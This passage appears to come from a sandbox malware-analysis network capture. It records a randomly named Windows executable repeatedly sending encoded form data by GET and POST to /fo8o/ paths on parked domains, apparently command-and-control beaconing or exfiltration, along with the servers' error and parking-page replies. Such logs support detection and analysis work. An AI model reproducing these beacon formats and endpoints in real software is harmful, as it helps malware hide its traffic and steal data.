Jan 9, 2025 09:42:34.797051907 CET	529	OUT	GET /fo8o/?tjVTF=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNRwjYf1m964qUSTP7WQyE0w3buAATyqoGj3VWMs6RJMKNOUgjB5nLBKL&2na=ihrTFVnP9VKx HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.magmadokum.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 9, 2025 09:43:35.510831118 CET	194	IN	HTTP/1.0 504 Gateway Time-out Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	61297	91.195.240.94	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 09:43:40.573947906 CET	795	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 218 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 74 6a 56 54 46 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 2f 59 32 62 39 55 71 7a 7a 63 47 32 64 62 4f 6d 77 6e 56 59 51 62 67 2f 6b 49 4e 49 58 33 73 49 52 56 36 6c 36 57 4c 72 4a 36 51 36 78 53 50 4d 41 3d 3d Data Ascii: tjVTF=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8p/Y2b9UqzzcG2dbOmwnVYQbg/kINIX3sIRV6l6WLrJ6Q6xSPMA==
Jan 9, 2025 09:43:41.213742971 CET	707	IN	HTTP/1.1 405 Not Allowed date: Thu, 09 Jan 2025 08:43:41 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	61298	91.195.240.94	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 09:43:43.116676092 CET	815	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 238 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 74 6a 56 54 46 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 6a 62 37 6d 73 37 66 78 71 5a 4b 51 52 69 6f 59 69 71 30 2b 66 36 33 6a 7a 4c 61 7a 7a 63 37 47 78 6e 4a 4e 41 48 36 75 4d 76 54 65 61 52 38 46 30 3d Data Ascii: tjVTF=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBjb7ms7fxqZKQRioYiq0+f63jzLazzc7GxnJNAH6uMvTeaR8F0=
Jan 9, 2025 09:43:43.752017975 CET	707	IN	HTTP/1.1 405 Not Allowed date: Thu, 09 Jan 2025 08:43:43 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	61299	91.195.240.94	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 09:43:45.655085087 CET	1828	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1250 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 74 6a 56 54 46 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 59 42 31 64 62 75 6d 32 33 67 5a 41 33 54 36 58 6f 6c 52 6a 6d 73 4b 79 68 55 33 62 61 5a 31 66 75 45 79 69 50 6e 59 6e 75 6d 6c 41 4e 56 46 4f 68 4f 31 36 35 63 4f 37 32 6c 69 68 4e 46 4c 78 6b 59 43 6a 56 6b 52 78 4d 79 6c 4c 70 48 69 2f 7a 71 65 4a 48 49 31 64 75 30 31 42 36 61 46 56 45 43 2b 47 4b 39 57 4a 55 36 67 59 4a 55 4f 65 63 43 6a 7a 4b 2b 73 77 44 47 61 79 62 38 5a 6d 48 5a 65 4a 2f 34 4f 53 53 44 72 58 4f 71 52 44 79 73 57 66 4e 33 69 72 64 62 46 68 52 78 48 61 73 64 [TRUNCATED] Data Ascii: tjVTF=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iYB1dbum23gZA3T6XolRjmsKyhU3baZ1fuEyiPnYnumlANVFOhO165cO72lihNFLxkYCjVkRxMylLpHi/zqeJHI1du01B6aFVEC+GK9WJU6gYJUOecCjzK+swDGayb8ZmHZeJ/4OSSDrXOqRDysWfN3irdbFhRxHasdGJ8fHmgRUQ7q75bPSfk5DUYG9UBoGdi8/mF/xbb5iSBE5JY12dA9aYXe5DGaUCD9a4C2fei4rNKdFN+GzeOFs4KTirg6C1sh2UiW7PC3d24PmACz9lABunaNscL+QtWzR0nRbjK8h1wMNNZK1kvb/iR6EQm7N74DrGQltGoA9vQXe0U2WPAe6bUcuOytdVwDMLHWNljpMefi/eWMjBUT3fjnIBpGONwD9rkkkIn+A7mFG+9xOsSmAUadtBX1dk9kUunNCqcl4f5MCW2BzPEOIR+e1ay8+hQ/ChRBPJwVWCGCWyf3Fkc2QBWfWPpp2E0RNOC+qW+ZxRVGuFuU2jzCm3jC5K4XbHCo/XzN6uMOrLPKX9Id5yGp9dWFkEWajtGUwXHVqBD7XTrjK/9L1w9OIePw+fEL6nm3Et6Mb99sz5OhAPvI995o9xsandSKPRIb/l8R2VgFBpDuMDVg7ItrwyuW2m2egK0ARbeIm3mD0EGjFM4uDzJg5ygjfSCBYiDSbgNs9AuiJ0a6aGr+HU9GZNSA6oWbQ7w7MfgUnz1Q/p0lddhTt6LmofjJX6Zvd9Cn2njiht9vpMm5kR2xt0B3helFWHYSC016023sLPWr3P1dil9p2vglsZ/Aq/YAly1yICJ3leJvCv3YvekhQdjXQzacR8k3S/g61q [TRUNCATED]
Jan 9, 2025 09:43:46.301734924 CET	707	IN	HTTP/1.1 405 Not Allowed date: Thu, 09 Jan 2025 08:43:46 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	61300	91.195.240.94	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 09:43:48.189817905 CET	530	OUT	GET /fo8o/?tjVTF=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp8oWpH63NEiVxRUOej85ag7JBXkSrwNx0GMHe1VrOeoqYxhSWqtxVT73&2na=ihrTFVnP9VKx HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.rssnewscast.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 9, 2025 09:43:48.877037048 CET	1236	IN	HTTP/1.1 200 OK date: Thu, 09 Jan 2025 08:43:48 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_D6l7IgoNWIHvrO7YQyS/TRMH/+2ZpuavSY/hI3BI4suelwLRqo8esSRtLmlxK+qQTTMES/ge8ke9EhExPWhBRQ== last-modified: Thu, 09 Jan 2025 08:43:48 GMT x-cache-miss-from: parking-7df97dc48-kq9x5 server: Parking/1.0 connection: close Data Raw: 32 45 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 44 36 6c 37 49 67 6f 4e 57 49 48 76 72 4f 37 59 51 79 53 2f 54 52 4d 48 2f 2b 32 5a 70 75 61 76 53 59 2f 68 49 33 42 49 34 73 75 65 6c 77 4c 52 71 6f 38 65 73 53 52 74 4c 6d 6c 78 4b 2b 71 51 54 54 4d 45 53 2f 67 65 38 6b 65 39 45 68 45 78 50 57 68 42 52 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED] Data Ascii: 2E4<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_D6l7IgoNWIHvrO7YQyS/TRMH/+2ZpuavSY/hI3BI4suelwLRqo8esSRtLmlxK+qQTTMES/ge8ke9EhExPWhBRQ==><head><meta charset="utf-8"><title>rssnewscast.com - rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informatio
Jan 9, 2025 09:43:48.877063036 CET	1236	IN	Data Raw: 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 Data Ascii: n youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searchin576g for!"><link rel="icon" type="image/png" href="//img.s
Jan 9, 2025 09:43:48.877074957 CET	1236	IN	Data Raw: 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d 30 Data Ascii: e-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,sele
Jan 9, 2025 09:43:48.877125978 CET	1236	IN	Data Raw: 3d 73 65 61 72 63 68 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d Data Ascii: =search]::-webkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{dis
Jan 9, 2025 09:43:48.877136946 CET	1236	IN	Data Raw: 74 2d 2d 74 77 6f 74 7b 77 69 64 74 68 3a 39 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 38 32 30 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 7b 70 61 64 64 69 6e 67 3a 30 20 30 20 31 2e 36 65 6d 20 30 7d 2e 74 77 6f 2d 74 69 65 Data Ascii: t--twot{width:90%;min-height:820px}.two-tier-ads-list{padding:0 0 1.6em 0}.two-tier-ads-list__list-element{list-style:none;padding:10px 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/temp
Jan 9, 2025 09:43:48.877146959 CET	1236	IN	Data Raw: 32 2c 32 35 35 2c 2e 37 29 7d 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e Data Ascii: 2,255,.7)}.webarchive-block__list-element-link:link,.webarchive-block__list-element-link:visited{text-decoration:none}.webarchive-block__list-element-link:hover,.webarchive-block__list-element-link:active,.webarchive-block__list-element-link:f
Jan 9, 2025 09:43:48.877157927 CET	1236	IN	Data Raw: 6c 6f 72 3a 23 35 35 35 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a Data Ascii: lor:#555}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#555}.container-contact-us{text-align:center}.container-conta
Jan 9, 2025 09:43:48.877170086 CET	1236	IN	Data Raw: 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 30 30 2c 32 30 30 2c 32 30 Data Ascii: a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:center}.cookie-modal-window__content-header
Jan 9, 2025 09:43:48.877180099 CET	1236	IN	Data Raw: 23 31 61 36 62 32 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 65 63 6f 6e 64 61 72 79 7b 62 61 63 6b 67 72 6f 75 Data Ascii: #1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:medium}.btn--secondary:hover{background-color:#727c83;border-color:#727c83;color:#fff;font-size:medium
Jan 9, 2025 09:43:48.877192020 CET	1236	IN	Data Raw: 72 64 61 6e 61 2c 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 73 61 6e 73 2d 73 65 72 69 66 7d 62 6f 64 79 2e 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 2d 65 6e 61 62 6c 65 64 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 33 30 30 70 78 7d Data Ascii: rdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-bottom:300px}.container-footer{padding-top:0;padding-left:5%;padding-right:5%;padding-bottom:10px} </style><script type="text/javascript"> var dto = {"uiOptimize
Jan 9, 2025 09:43:48.881983995 CET	1236	IN	Data Raw: 2c 22 74 22 3a 22 63 6f 6e 74 65 6e 74 22 2c 22 70 75 73 22 3a 22 73 65 73 3d 59 33 4a 6c 50 54 45 33 4d 7a 59 30 4d 54 49 79 4d 6a 67 6d 64 47 4e 70 5a 44 31 33 64 33 63 75 63 6e 4e 7a 62 6d 56 33 63 32 4e 68 63 33 51 75 59 32 39 74 4e 6a 63 33 Data Ascii: ,"t":"content","pus":"ses=Y3JlPTE3MzY0MTIyMjgmdGNpZD13d3cucnNzbmV3c2Nhc3QuY29tNjc3ZjhjNDRiNjUxYjAuODc1MjA4NDcmdGFzaz1zZWFyY2gmZG9tYWluPXJzc25ld3NjYXN0LmNvbSZhX2lkPTMmc2Vzc2lvbj1iRGF3M1d0bHg4Y3NxM0tWSEpWNQ==","postActionParameter":{"feedback":"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	61301	66.29.149.46	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
